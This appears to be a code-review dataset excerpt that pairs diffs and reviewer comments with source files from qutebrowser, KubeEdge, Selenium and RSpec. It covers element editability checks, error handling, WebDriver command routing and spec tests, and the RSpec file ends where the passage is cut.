if objtype in ['text', 'email', 'url', 'tel', 'number', 'password',
'search']:
return self.is_writable()
else:
return False
def _is_editable_div(self):
"""Check if a div-element is editable.
Return:
True if the element is editable, False otherwise.
"""
# Beginnings of div-classes which are actually some kind of editor.
div_classes = ('CodeMirror', # Javascript editor over a textarea
'kix-', # Google Docs editor
'ace_') # http://ace.c9.io/
for klass in self._elem.classes():
if any([klass.startswith(e) for e in div_classes]):
return True
return False
def is_editable(self, strict=False):
"""Check whether we should switch to insert mode for this element.
Args:
strict: Whether to do stricter checking so only fields where we can
get the value match, for use with the :editor command.
Return:
True if we should switch to insert mode, False otherwise.
"""
# pylint: disable=too-many-return-statements
self._check_vanished()
roles = ('combobox', 'textbox')
log.misc.debug("Checking if element is editable: {}".format(
repr(self)))
tag = self._elem.tagName().lower()
if self.is_content_editable() and self.is_writable():
return True
elif self.get('role', None) in roles and self.is_writable():
return True
elif tag == 'input':
return self._is_editable_input()
elif tag == 'textarea':
return self.is_writable()
elif tag in ('embed', 'applet'):
# Flash/Java/...
return config.get('input', 'insert-mode-on-plugins') and not strict
elif tag == 'object':
return self._is_editable_object() and not strict
elif tag == 'div':
return self._is_editable_div() and not strict
else:
return False
def is_text_input(self):
"""Check if this element is some kind of text box."""
self._check_vanished()
roles = ('combobox', 'textbox')
tag = self._elem.tagName().lower()
return self.get('role', None) in roles or tag in ('input', 'textarea')
def debug_text(self):
"""Get a text based on an element suitable for debug output."""
self._check_vanished()
return utils.compact_text(self._elem.toOuterXml(), 500)
def javascript_escape(text):
"""Escape values special to javascript in strings.
With this we should be able to use something like:
elem.evaluateJavaScript("this.value='{}'".format(javascript_escape(...)))
And all values should work.
"""
# This is a list of tuples because order matters, and using OrderedDict
# makes no sense because we don't actually need dict-like properties.
replacements = (
('\\', r'\\'), # First escape all literal \ signs as \\.
("'", r"\'"), # Then escape ' and " as \' and \".
('"', r'\"'), # (note it won't hurt when we escape the wrong one).
('\n', r'\n'), # We also need to escape newlines for some reason.
('\r', r'\r'),
('\x00', r'\x00'),
('\ufeff', r'\ufeff'),
# http://stackoverflow.com/questions/2965293/
('\u2028', r'\u2028'),
('\u2029', r'\u2029'),
)
for orig, repl in replacements:
text = text.replace(orig, repl)
return text
def get_child_frames(startframe):
"""Get all children recursively of a given QWebFrame.
Loosely based on http://blog.nextgenetics.net/?e=64
Args:
startframe: The QWebFrame to start with.
Return:
A list of children QWebFrame, or an empty list.
"""
results = []
frames = [startframe]
while frames:
new_frames = []
for frame in frames:
results.append(frame)
new_frames += frame.childFrames()
frames = new_frames
return results
def focus_elem(frame):
"""Get the focused element in a web frame.
Args:
frame: The QWebFrame to search in.
"""
elem = frame.findFirstElement(SELECTORS[Group.focus])
return WebElementWrapper(elem)
def rect_on_view(elem, elem_geometry=None):
"""Get the geometry of the element relative to the webview.
We need this as a standalone function (as opposed to a WebElementWrapper
method) because we want to run is_visible before wrapping when hinting for
performance reasons.
Args:
elem: The QWebElement to get the rect for.
elem_geometry: The geometry of the element, or None.
Calling QWebElement::geometry is rather expensive so we
want to avoid doing it twice.
"""
if elem.isNull():
raise IsNullError("Got called on a null element!")
if elem_geometry is None:
elem_geometry = elem.geometry()
frame = elem.webFrame()
rect = QRect(elem_geometry)
while frame is not None:
rect.translate(frame.geometry().topLeft())
rect.translate(frame.scrollPosition() * -1)
frame = frame.parentFrame()
return rect
def is_visible(elem, mainframe):
"""Check if the given element is visible in the frame.
We need this as a standalone function (as opposed to a WebElementWrapper
method) because we want to check this before wrapping when hinting for
performance reasons.
Args:
elem: The QWebElement to check.
mainframe: The QWebFrame in which the element should be visible.
"""
if elem.isNull():
raise IsNullError("Got called on a null element!")
# CSS attributes which hide an element
hidden_attributes = {
'visibility': 'hidden',
'display': 'none',
}
for k, v in hidden_attributes.items():
if elem.styleProperty(k, QWebElement.ComputedStyle) == v:
return False
elem_geometry = elem.geometry()
if not elem_geometry.isValid() and elem_geometry.x() == 0:
# Most likely an invisible link
return False
# First check if the element is visible on screen
elem_rect = rect_on_view(elem, elem_geometry=elem_geometry)
mainframe_geometry = mainframe.geometry()
if elem_rect.isValid():
visible_on_screen = mainframe_geometry.intersects(elem_rect)
else:
# We got an invalid rectangle (width/height 0/0 probably), but this
# can still be a valid link.
visible_on_screen = mainframe_geometry.contains(
elem_rect.topLeft())
# Then check if it's visible in its frame if it's not in the main
# frame.
elem_frame = elem.webFrame()
framegeom = QRect(elem_frame.geometry())
if not framegeom.isValid():
visible_in_frame = False
elif elem_frame.parentFrame() is not None:
framegeom.moveTo(0, 0)
framegeom.translate(elem_frame.scrollPosition())
if elem_geometry.isValid():
visible_in_frame = framegeom.intersects(elem_geometry)
else:
# We got an invalid rectangle (width/height 0/0 probably), but
# this can still be a valid link.
visible_in_frame = framegeom.contains(elem_geometry.topLeft())
else:
visible_in_frame = visible_on_screen
return all([visible_on_screen, visible_in_frame])
| 1 | 14,439 | Nitpick: Please add a period after `link` :wink: | qutebrowser-qutebrowser | py |
@@ -67,5 +67,8 @@ func (hs *HandlerStub) Start() {
klog.Errorf("New upstream controller failed with error: %v", err)
return
}
- upstream.Start()
+ if err := upstream.Start(); err != nil {
+ klog.Errorf("Failed to start upstream with error: %v", err)
+ return
+ }
} | 1 | /*
Copyright 2019 The KubeEdge Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package handlerstub
import (
"k8s.io/klog"
"github.com/kubeedge/beehive/pkg/core"
"github.com/kubeedge/kubeedge/tests/stubs/common/constants"
)
// Init module
func init() {
core.Register(&HandlerStub{})
}
// HandlerStub definition
type HandlerStub struct {
podManager *PodManager
}
func (*HandlerStub) Enable() bool {
return true
}
// Return module name
func (*HandlerStub) Name() string {
return constants.HandlerStub
}
// Return module group
func (*HandlerStub) Group() string {
return constants.MetaGroup
}
// Start handler hub
func (hs *HandlerStub) Start() {
// New pod manager
pm, err := NewPodManager()
if err != nil {
klog.Errorf("Failed to create pod manager with error: %v", err)
return
}
hs.podManager = pm
// Wait for message
klog.Infof("Wait for message")
hs.WaitforMessage()
// Start upstream controller
upstream, err := NewUpstreamController(pm)
if err != nil {
klog.Errorf("New upstream controller failed with error: %v", err)
return
}
upstream.Start()
}
| 1 | 16,749 | we got no chance that `err` is not nil here, need to revisit how `NewUpstreamController` is defined. | kubeedge-kubeedge | go |
@@ -247,7 +247,8 @@ public class HttpCommandExecutor implements CommandExecutor, NeedsLocalLogs {
.put(GET_LOG, post("/session/:sessionId/log"))
.put(GET_AVAILABLE_LOG_TYPES, get("/session/:sessionId/log/types"))
- .put(STATUS, get("/status"));
+ .put(STATUS, get("/status"))
+ .put(HEAP_SNAPSHOT, get("/session/:sessionId/chromium/heap_snapshot"));
nameToUrl = builder.build();
} | 1 | /*
Copyright 2007-2011 Selenium committers
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package org.openqa.selenium.remote;
import com.google.common.base.Throwables;
import com.google.common.collect.ImmutableMap;
import org.apache.http.Header;
import org.apache.http.HttpEntity;
import org.apache.http.HttpHost;
import org.apache.http.HttpResponse;
import org.apache.http.NoHttpResponseException;
import org.apache.http.auth.AuthScope;
import org.apache.http.auth.UsernamePasswordCredentials;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.client.methods.HttpUriRequest;
import org.apache.http.client.params.HttpClientParams;
import org.apache.http.entity.ContentType;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.params.BasicHttpParams;
import org.apache.http.params.CoreConnectionPNames;
import org.apache.http.params.HttpParams;
import org.apache.http.protocol.BasicHttpContext;
import org.apache.http.protocol.HttpContext;
import org.apache.http.util.EntityUtils;
import org.openqa.selenium.UnsupportedCommandException;
import org.openqa.selenium.WebDriverException;
import org.openqa.selenium.logging.LocalLogs;
import org.openqa.selenium.logging.LogEntry;
import org.openqa.selenium.logging.LogType;
import org.openqa.selenium.logging.NeedsLocalLogs;
import org.openqa.selenium.logging.profiler.HttpProfilerLogEntry;
import org.openqa.selenium.remote.internal.HttpClientFactory;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.BindException;
import java.net.MalformedURLException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.nio.charset.Charset;
import java.util.Map;
import static org.apache.http.protocol.ExecutionContext.HTTP_TARGET_HOST;
import static org.openqa.selenium.remote.DriverCommand.*;
public class HttpCommandExecutor implements CommandExecutor, NeedsLocalLogs {
private static final int MAX_REDIRECTS = 10;
private final HttpHost targetHost;
private final URL remoteServer;
private final Map<String, CommandInfo> nameToUrl;
private final HttpClient client;
private final ErrorCodes errorCodes = new ErrorCodes();
private static HttpClientFactory httpClientFactory;
private LocalLogs logs = LocalLogs.getNullLogger();
public HttpCommandExecutor(URL addressOfRemoteServer) {
this(ImmutableMap.<String, CommandInfo>of(), addressOfRemoteServer);
}
public HttpCommandExecutor(Map<String, CommandInfo> additionalCommands, URL addressOfRemoteServer) {
try {
remoteServer = addressOfRemoteServer == null ?
new URL(System.getProperty("webdriver.remote.server", "http://localhost:4444/wd/hub")) :
addressOfRemoteServer;
} catch (MalformedURLException e) {
throw new WebDriverException(e);
}
HttpParams params = new BasicHttpParams();
// Use the JRE default for the socket linger timeout.
params.setParameter(CoreConnectionPNames.SO_LINGER, -1);
HttpClientParams.setRedirecting(params, false);
synchronized (HttpCommandExecutor.class) {
if (httpClientFactory == null) {
httpClientFactory = new HttpClientFactory();
}
}
client = httpClientFactory.getHttpClient();
if (addressOfRemoteServer != null && addressOfRemoteServer.getUserInfo() != null) {
// Use HTTP Basic auth
UsernamePasswordCredentials credentials = new
UsernamePasswordCredentials(addressOfRemoteServer.getUserInfo());
((DefaultHttpClient) client).getCredentialsProvider().
setCredentials(AuthScope.ANY, credentials);
}
// Some machines claim "localhost.localdomain" is the same as "localhost".
// This assumption is not always true.
String host = remoteServer.getHost().replace(".localdomain", "");
targetHost = new HttpHost(
host, remoteServer.getPort(), remoteServer.getProtocol());
ImmutableMap.Builder<String, CommandInfo> builder = ImmutableMap.builder();
for (Map.Entry<String, CommandInfo> entry : additionalCommands.entrySet()) {
builder.put(entry.getKey(), entry.getValue());
}
builder
.put(GET_ALL_SESSIONS, get("/sessions"))
.put(NEW_SESSION, post("/session"))
.put(GET_CAPABILITIES, get("/session/:sessionId"))
.put(QUIT, delete("/session/:sessionId"))
.put(GET_CURRENT_WINDOW_HANDLE, get("/session/:sessionId/window_handle"))
.put(GET_WINDOW_HANDLES, get("/session/:sessionId/window_handles"))
.put(GET, post("/session/:sessionId/url"))
// The Alert API is still experimental and should not be used.
.put(GET_ALERT, get("/session/:sessionId/alert"))
.put(DISMISS_ALERT, post("/session/:sessionId/dismiss_alert"))
.put(ACCEPT_ALERT, post("/session/:sessionId/accept_alert"))
.put(GET_ALERT_TEXT, get("/session/:sessionId/alert_text"))
.put(SET_ALERT_VALUE, post("/session/:sessionId/alert_text"))
.put(GO_FORWARD, post("/session/:sessionId/forward"))
.put(GO_BACK, post("/session/:sessionId/back"))
.put(REFRESH, post("/session/:sessionId/refresh"))
.put(EXECUTE_SCRIPT, post("/session/:sessionId/execute"))
.put(EXECUTE_ASYNC_SCRIPT, post("/session/:sessionId/execute_async"))
.put(GET_CURRENT_URL, get("/session/:sessionId/url"))
.put(GET_TITLE, get("/session/:sessionId/title"))
.put(GET_PAGE_SOURCE, get("/session/:sessionId/source"))
.put(SCREENSHOT, get("/session/:sessionId/screenshot"))
.put(SET_BROWSER_VISIBLE, post("/session/:sessionId/visible"))
.put(IS_BROWSER_VISIBLE, get("/session/:sessionId/visible"))
.put(FIND_ELEMENT, post("/session/:sessionId/element"))
.put(FIND_ELEMENTS, post("/session/:sessionId/elements"))
.put(GET_ACTIVE_ELEMENT, post("/session/:sessionId/element/active"))
.put(FIND_CHILD_ELEMENT, post("/session/:sessionId/element/:id/element"))
.put(FIND_CHILD_ELEMENTS, post("/session/:sessionId/element/:id/elements"))
.put(CLICK_ELEMENT, post("/session/:sessionId/element/:id/click"))
.put(CLEAR_ELEMENT, post("/session/:sessionId/element/:id/clear"))
.put(SUBMIT_ELEMENT, post("/session/:sessionId/element/:id/submit"))
.put(GET_ELEMENT_TEXT, get("/session/:sessionId/element/:id/text"))
.put(SEND_KEYS_TO_ELEMENT, post("/session/:sessionId/element/:id/value"))
.put(UPLOAD_FILE, post("/session/:sessionId/file"))
.put(GET_ELEMENT_VALUE, get("/session/:sessionId/element/:id/value"))
.put(GET_ELEMENT_TAG_NAME, get("/session/:sessionId/element/:id/name"))
.put(IS_ELEMENT_SELECTED, get("/session/:sessionId/element/:id/selected"))
.put(IS_ELEMENT_ENABLED, get("/session/:sessionId/element/:id/enabled"))
.put(IS_ELEMENT_DISPLAYED, get("/session/:sessionId/element/:id/displayed"))
.put(HOVER_OVER_ELEMENT, post("/session/:sessionId/element/:id/hover"))
.put(GET_ELEMENT_LOCATION, get("/session/:sessionId/element/:id/location"))
.put(GET_ELEMENT_LOCATION_ONCE_SCROLLED_INTO_VIEW,
get("/session/:sessionId/element/:id/location_in_view"))
.put(GET_ELEMENT_SIZE, get("/session/:sessionId/element/:id/size"))
.put(GET_ELEMENT_ATTRIBUTE, get("/session/:sessionId/element/:id/attribute/:name"))
.put(ELEMENT_EQUALS, get("/session/:sessionId/element/:id/equals/:other"))
.put(GET_ALL_COOKIES, get("/session/:sessionId/cookie"))
.put(ADD_COOKIE, post("/session/:sessionId/cookie"))
.put(DELETE_ALL_COOKIES, delete("/session/:sessionId/cookie"))
.put(DELETE_COOKIE, delete("/session/:sessionId/cookie/:name"))
.put(SWITCH_TO_FRAME, post("/session/:sessionId/frame"))
.put(SWITCH_TO_WINDOW, post("/session/:sessionId/window"))
.put(GET_WINDOW_SIZE, get("/session/:sessionId/window/:windowHandle/size"))
.put(GET_WINDOW_POSITION, get("/session/:sessionId/window/:windowHandle/position"))
.put(SET_WINDOW_SIZE, post("/session/:sessionId/window/:windowHandle/size"))
.put(SET_WINDOW_POSITION, post("/session/:sessionId/window/:windowHandle/position"))
.put(MAXIMIZE_WINDOW, post("/session/:sessionId/window/:windowHandle/maximize"))
.put(CLOSE, delete("/session/:sessionId/window"))
.put(DRAG_ELEMENT, post("/session/:sessionId/element/:id/drag"))
.put(GET_ELEMENT_VALUE_OF_CSS_PROPERTY,
get("/session/:sessionId/element/:id/css/:propertyName"))
.put(IMPLICITLY_WAIT, post("/session/:sessionId/timeouts/implicit_wait"))
.put(SET_SCRIPT_TIMEOUT, post("/session/:sessionId/timeouts/async_script"))
.put(SET_TIMEOUT, post("/session/:sessionId/timeouts"))
.put(EXECUTE_SQL, post("/session/:sessionId/execute_sql"))
.put(GET_LOCATION, get("/session/:sessionId/location"))
.put(SET_LOCATION, post("/session/:sessionId/location"))
.put(GET_APP_CACHE_STATUS, get("/session/:sessionId/application_cache/status"))
.put(IS_BROWSER_ONLINE, get("/session/:sessionId/browser_connection"))
.put(SET_BROWSER_ONLINE, post("/session/:sessionId/browser_connection"))
// TODO (user): Would it be better to combine this command with
// GET_LOCAL_STORAGE_SIZE?
.put(GET_LOCAL_STORAGE_ITEM, get("/session/:sessionId/local_storage/key/:key"))
.put(REMOVE_LOCAL_STORAGE_ITEM, delete("/session/:sessionId/local_storage/key/:key"))
.put(GET_LOCAL_STORAGE_KEYS, get("/session/:sessionId/local_storage"))
.put(SET_LOCAL_STORAGE_ITEM, post("/session/:sessionId/local_storage"))
.put(CLEAR_LOCAL_STORAGE, delete("/session/:sessionId/local_storage"))
.put(GET_LOCAL_STORAGE_SIZE, get("/session/:sessionId/local_storage/size"))
// TODO (user): Would it be better to combine this command with
// GET_SESSION_STORAGE_SIZE?
.put(GET_SESSION_STORAGE_ITEM, get("/session/:sessionId/session_storage/key/:key"))
.put(REMOVE_SESSION_STORAGE_ITEM, delete("/session/:sessionId/session_storage/key/:key"))
.put(GET_SESSION_STORAGE_KEYS, get("/session/:sessionId/session_storage"))
.put(SET_SESSION_STORAGE_ITEM, post("/session/:sessionId/session_storage"))
.put(CLEAR_SESSION_STORAGE, delete("/session/:sessionId/session_storage"))
.put(GET_SESSION_STORAGE_SIZE, get("/session/:sessionId/session_storage/size"))
.put(GET_SCREEN_ORIENTATION, get("/session/:sessionId/orientation"))
.put(SET_SCREEN_ORIENTATION, post("/session/:sessionId/orientation"))
// Interactions-related commands.
.put(CLICK, post("/session/:sessionId/click"))
.put(DOUBLE_CLICK, post("/session/:sessionId/doubleclick"))
.put(MOUSE_DOWN, post("/session/:sessionId/buttondown"))
.put(MOUSE_UP, post("/session/:sessionId/buttonup"))
.put(MOVE_TO, post("/session/:sessionId/moveto"))
.put(SEND_KEYS_TO_ACTIVE_ELEMENT, post("/session/:sessionId/keys"))
// IME related commands.
.put(IME_GET_AVAILABLE_ENGINES, get("/session/:sessionId/ime/available_engines"))
.put(IME_GET_ACTIVE_ENGINE, get("/session/:sessionId/ime/active_engine"))
.put(IME_IS_ACTIVATED, get("/session/:sessionId/ime/activated"))
.put(IME_DEACTIVATE, post("/session/:sessionId/ime/deactivate"))
.put(IME_ACTIVATE_ENGINE, post("/session/:sessionId/ime/activate"))
// Advanced Touch API commands
// TODO(berrada): Refactor single tap with mouse click.
.put(TOUCH_SINGLE_TAP, post("/session/:sessionId/touch/click"))
.put(TOUCH_DOWN, post("/session/:sessionId/touch/down"))
.put(TOUCH_UP, post("/session/:sessionId/touch/up"))
.put(TOUCH_MOVE, post("/session/:sessionId/touch/move"))
.put(TOUCH_SCROLL, post("/session/:sessionId/touch/scroll"))
.put(TOUCH_DOUBLE_TAP, post("/session/:sessionId/touch/doubleclick"))
.put(TOUCH_LONG_PRESS, post("/session/:sessionId/touch/longclick"))
.put(TOUCH_FLICK, post("/session/:sessionId/touch/flick"))
.put(GET_LOG, post("/session/:sessionId/log"))
.put(GET_AVAILABLE_LOG_TYPES, get("/session/:sessionId/log/types"))
.put(STATUS, get("/status"));
nameToUrl = builder.build();
}
public void setLocalLogs(LocalLogs logs) {
this.logs = logs;
}
private void log(String logType, LogEntry entry) {
logs.addEntry(logType, entry);
}
public URL getAddressOfRemoteServer() {
return remoteServer;
}
public Response execute(Command command) throws IOException {
HttpContext context = new BasicHttpContext();
if (command.getSessionId() == null) {
if (QUIT.equals(command.getName())) {
return new Response();
}
if (!GET_ALL_SESSIONS.equals(command.getName())
&& !NEW_SESSION.equals(command.getName())) {
throw new SessionNotFoundException("Session ID is null");
}
}
CommandInfo info = nameToUrl.get(command.getName());
try {
HttpUriRequest httpMethod = info.getMethod(remoteServer, command);
setAcceptHeader(httpMethod);
if (httpMethod instanceof HttpPost) {
String payload = new BeanToJsonConverter().convert(command.getParameters());
((HttpPost) httpMethod).setEntity(new StringEntity(payload, "utf-8"));
httpMethod.addHeader("Content-Type", "application/json; charset=utf-8");
}
// Do not allow web proxy caches to cache responses to "get" commands
if (httpMethod instanceof HttpGet) {
httpMethod.addHeader("Cache-Control", "no-cache");
}
log(LogType.PROFILER, new HttpProfilerLogEntry(command.getName(), true));
HttpResponse response = fallBackExecute(context, httpMethod);
log(LogType.PROFILER, new HttpProfilerLogEntry(command.getName(), false));
response = followRedirects(client, context, response, /* redirect count */0);
final EntityWithEncoding entityWithEncoding = new EntityWithEncoding(response.getEntity());
return createResponse(response, context, entityWithEncoding);
} catch (UnsupportedCommandException e) {
if (e.getMessage() == null || "".equals(e.getMessage())) {
throw new UnsupportedOperationException(
"No information from server. Command name was: " + command.getName(),
e.getCause());
}
throw e;
}
}
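  // Executes the request, retrying once after a short pause when the local or
  // remote ephemeral sockets appear to be exhausted.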
private HttpResponse fallBackExecute(HttpContext context, HttpUriRequest httpMethod)
throws IOException {
try {
return client.execute(targetHost, httpMethod, context);
} catch (BindException e) {
// If we get this, there's a chance we've used all the local ephemeral sockets
// Sleep for a bit to let the OS reclaim them, then try the request again.
try {
Thread.sleep(2000);
} catch (InterruptedException ie) {
throw Throwables.propagate(ie);
}
} catch (NoHttpResponseException e) {
// If we get this, there's a chance we've used all the remote ephemeral sockets
// Sleep for a bit to let the OS reclaim them, then try the request again.
try {
Thread.sleep(2000);
} catch (InterruptedException ie) {
throw Throwables.propagate(ie);
}
}
return client.execute(targetHost, httpMethod, context);
}
private void setAcceptHeader(HttpUriRequest httpMethod) {
httpMethod.addHeader("Accept", "application/json, image/png");
}
private HttpResponse followRedirects(
HttpClient client, HttpContext context, HttpResponse response, int redirectCount) {
if (!isRedirect(response)) {
return response;
}
try {
// Make sure that the previous connection is freed.
HttpEntity httpEntity = response.getEntity();
if (httpEntity != null) {
EntityUtils.consume(httpEntity);
}
} catch (IOException e) {
throw new WebDriverException(e);
}
if (redirectCount > MAX_REDIRECTS) {
throw new WebDriverException("Maximum number of redirects exceeded. Aborting");
}
String location = response.getFirstHeader("location").getValue();
URI uri;
try {
uri = buildUri(context, location);
HttpGet get = new HttpGet(uri);
setAcceptHeader(get);
HttpResponse newResponse = client.execute(targetHost, get, context);
return followRedirects(client, context, newResponse, redirectCount + 1);
} catch (URISyntaxException e) {
throw new WebDriverException(e);
} catch (ClientProtocolException e) {
throw new WebDriverException(e);
} catch (IOException e) {
throw new WebDriverException(e);
}
}
private URI buildUri(HttpContext context, String location) throws URISyntaxException {
URI uri;
uri = new URI(location);
if (!uri.isAbsolute()) {
HttpHost host = (HttpHost) context.getAttribute(HTTP_TARGET_HOST);
uri = new URI(host.toURI() + location);
}
return uri;
}
private boolean isRedirect(HttpResponse response) {
int code = response.getStatusLine().getStatusCode();
return (code == 301 || code == 302 || code == 303 || code == 307)
&& response.containsHeader("location");
}
class EntityWithEncoding {
private final String charSet;
private final byte[] content;
EntityWithEncoding(HttpEntity entity) throws IOException {
try {
if (entity != null) {
content = EntityUtils.toByteArray(entity);
Charset entityCharset = ContentType.getOrDefault(entity).getCharset();
charSet = entityCharset != null ? entityCharset.name() : null;
} else {
content = new byte[0];
charSet = null;
}
} finally {
EntityUtils.consume(entity);
}
}
public String getContentString()
throws UnsupportedEncodingException {
return new String(content, charSet != null ? charSet : "utf-8");
}
public byte[] getContent() {
return content;
}
public boolean hasEntityContent() {
return content != null;
}
}
private Response createResponse(HttpResponse httpResponse, HttpContext context,
EntityWithEncoding entityWithEncoding) throws IOException {
final Response response;
Header header = httpResponse.getFirstHeader("Content-Type");
if (header != null && header.getValue().startsWith("application/json")) {
String responseAsText = entityWithEncoding.getContentString();
try {
response = new JsonToBeanConverter().convert(Response.class, responseAsText);
} catch (ClassCastException e) {
if (responseAsText != null && "".equals(responseAsText)) {
// The remote server has died, but has already set some headers.
// Normally this occurs when the final window of the firefox driver
// is closed on OS X. Return null, as the return value _should_ be
// being ignored. This is not an elegant solution.
return null;
}
throw new WebDriverException("Cannot convert text to response: " + responseAsText, e);
}
} else {
response = new Response();
if (header != null && header.getValue().startsWith("image/png")) {
response.setValue(entityWithEncoding.getContent());
} else if (entityWithEncoding.hasEntityContent()) {
response.setValue(entityWithEncoding.getContentString());
}
HttpHost finalHost = (HttpHost) context.getAttribute(HTTP_TARGET_HOST);
String uri = finalHost.toURI();
String sessionId = HttpSessionId.getSessionId(uri);
if (sessionId != null) {
response.setSessionId(sessionId);
}
int statusCode = httpResponse.getStatusLine().getStatusCode();
if (!(statusCode > 199 && statusCode < 300)) {
// 4xx represents an unknown command or a bad request.
if (statusCode > 399 && statusCode < 500) {
response.setStatus(ErrorCodes.UNKNOWN_COMMAND);
} else if (statusCode > 499 && statusCode < 600) {
// 5xx represents an internal server error. The response status should already be set, but
// if not, set it to a general error code.
if (response.getStatus() == ErrorCodes.SUCCESS) {
response.setStatus(ErrorCodes.UNHANDLED_ERROR);
}
} else {
response.setStatus(ErrorCodes.UNHANDLED_ERROR);
}
}
if (response.getValue() instanceof String) {
// We normalise to \n because Java will translate this to \r\n
// if this is suitable on our platform, and if we have \r\n, java will
// turn this into \r\r\n, which would be Bad!
response.setValue(((String) response.getValue()).replace("\r\n", "\n"));
}
}
response.setState(errorCodes.toState(response.getStatus()));
return response;
}
private static CommandInfo get(String url) {
return new CommandInfo(url, HttpVerb.GET);
}
private static CommandInfo post(String url) {
return new CommandInfo(url, HttpVerb.POST);
}
private static CommandInfo delete(String url) {
return new CommandInfo(url, HttpVerb.DELETE);
}
}
| 1 | 10,649 | Instead of building in routing for a browser-specific command, could you refactor the HttpCommandExecutor to allow arbitrary commands to be registered? | SeleniumHQ-selenium | java |
@@ -348,6 +348,12 @@ module RSpec::Core
end
describe "#its" do
+
+ it "should issue deprecation warning" do
+ expect_deprecation_with_call_site(__FILE__, __LINE__+1, '"its" method')
+ RSpec::Core::ExampleGroup.its(nil) {}
+ end
+
subject do
Class.new do
def initialize | 1 | require 'spec_helper'
module RSpec::Core
describe MemoizedHelpers do
before(:each) { RSpec.configuration.configure_expectation_framework }
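    # Runs a throwaway example group and returns the value `subject` resolves
    # to inside one of its examples.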
def subject_value_for(describe_arg, &block)
group = ExampleGroup.describe(describe_arg, &block)
subject_value = nil
group.example { subject_value = subject }
group.run
subject_value
end
describe "implicit subject" do
describe "with a class" do
it "returns an instance of the class" do
expect(subject_value_for(Array)).to eq([])
end
end
describe "with a Module" do
it "returns the Module" do
expect(subject_value_for(Enumerable)).to eq(Enumerable)
end
end
describe "with a string" do
it "returns the string" do
expect(subject_value_for("Foo")).to eq("Foo")
end
end
describe "with a number" do
it "returns the number" do
expect(subject_value_for(15)).to eq(15)
end
end
it "can be overriden and super'd to from a nested group" do
outer_subject_value = inner_subject_value = nil
ExampleGroup.describe(Array) do
subject { super() << :parent_group }
example { outer_subject_value = subject }
context "nested" do
subject { super() << :child_group }
example { inner_subject_value = subject }
end
end.run
expect(outer_subject_value).to eq([:parent_group])
expect(inner_subject_value).to eq([:parent_group, :child_group])
end
end
describe "explicit subject" do
it "yields the example in which it is eval'd" do
example_yielded_to_subject = nil
example_yielded_to_example = nil
group = ExampleGroup.describe
group.subject { |e| example_yielded_to_subject = e }
group.example { |e| subject; example_yielded_to_example = e }
group.run
expect(example_yielded_to_subject).to eq example_yielded_to_example
end
[false, nil].each do |falsy_value|
context "with a value of #{falsy_value.inspect}" do
it "is evaluated once per example" do
group = ExampleGroup.describe(Array)
group.before do
Object.should_receive(:this_question?).once.and_return(falsy_value)
end
group.subject do
Object.this_question?
end
group.example do
subject
subject
end
expect(group.run).to be_truthy, "expected subject block to be evaluated only once"
end
end
end
describe "defined in a top level group" do
it "replaces the implicit subject in that group" do
subject_value = subject_value_for(Array) do
subject { [1, 2, 3] }
end
expect(subject_value).to eq([1, 2, 3])
end
end
describe "defined in a top level group" do
let(:group) do
ExampleGroup.describe do
subject{ [4, 5, 6] }
end
end
it "is available in a nested group (subclass)" do
subject_value = nil
group.describe("I'm nested!") do
example { subject_value = subject }
end.run
expect(subject_value).to eq([4, 5, 6])
end
it "is available in a doubly nested group (subclass)" do
subject_value = nil
group.describe("Nesting level 1") do
describe("Nesting level 2") do
example { subject_value = subject }
end
end.run
expect(subject_value).to eq([4, 5, 6])
end
it "can be overriden and super'd to from a nested group" do
subject_value = nil
group.describe("Nested") do
subject { super() + [:override] }
example { subject_value = subject }
end.run
expect(subject_value).to eq([4, 5, 6, :override])
end
context 'when referenced in a `before(:all)` hook' do
before do
expect(::RSpec).to respond_to(:warn_deprecation)
::RSpec.stub(:warn_deprecation)
end
def define_and_run_group
values = { :reference_lines => [] }
ExampleGroup.describe do
subject { [1, 2] }
let(:list) { %w[ a b ] }
before(:all) do
subject << 3; values[:reference_lines] << __LINE__
values[:final_subject_value_in_before_all] = subject; values[:reference_lines] << __LINE__
end
example do
list << '1'
values[:list_in_ex_1] = list
values[:subject_value_in_example] = subject
end
example do
list << '2'
values[:list_in_ex_2] = list
end
end.run
values
end
it 'memoizes the value within the before(:all) hook' do
values = define_and_run_group
expect(values.fetch(:final_subject_value_in_before_all)).to eq([1, 2, 3])
end
it 'preserves the memoization into the individual examples' do
values = define_and_run_group
expect(values.fetch(:subject_value_in_example)).to eq([1, 2, 3])
end
it 'does not cause other lets to be shared across examples' do
values = define_and_run_group
expect(values.fetch(:list_in_ex_1)).to eq(%w[ a b 1 ])
expect(values.fetch(:list_in_ex_2)).to eq(%w[ a b 2 ])
end
it 'prints a warning since `subject` declarations are not intended to be used in :all hooks' do
msgs = []
::RSpec.stub(:warn_deprecation) { |msg| msgs << msg }
values = define_and_run_group
expect(msgs).to include(*values[:reference_lines].map { |line|
match(/subject accessed.*#{__FILE__}:#{line}/m)
})
end
end
end
describe "with a name" do
it "yields the example in which it is eval'd" do
example_yielded_to_subject = nil
example_yielded_to_example = nil
group = ExampleGroup.describe
group.subject(:foo) { |e| example_yielded_to_subject = e }
group.example { |e| foo; example_yielded_to_example = e }
group.run
expect(example_yielded_to_subject).to eq example_yielded_to_example
end
it "defines a method that returns the memoized subject" do
list_value_1 = list_value_2 = subject_value_1 = subject_value_2 = nil
ExampleGroup.describe do
subject(:list) { [1, 2, 3] }
example do
list_value_1 = list
list_value_2 = list
subject_value_1 = subject
subject_value_2 = subject
end
end.run
expect(list_value_1).to eq([1, 2, 3])
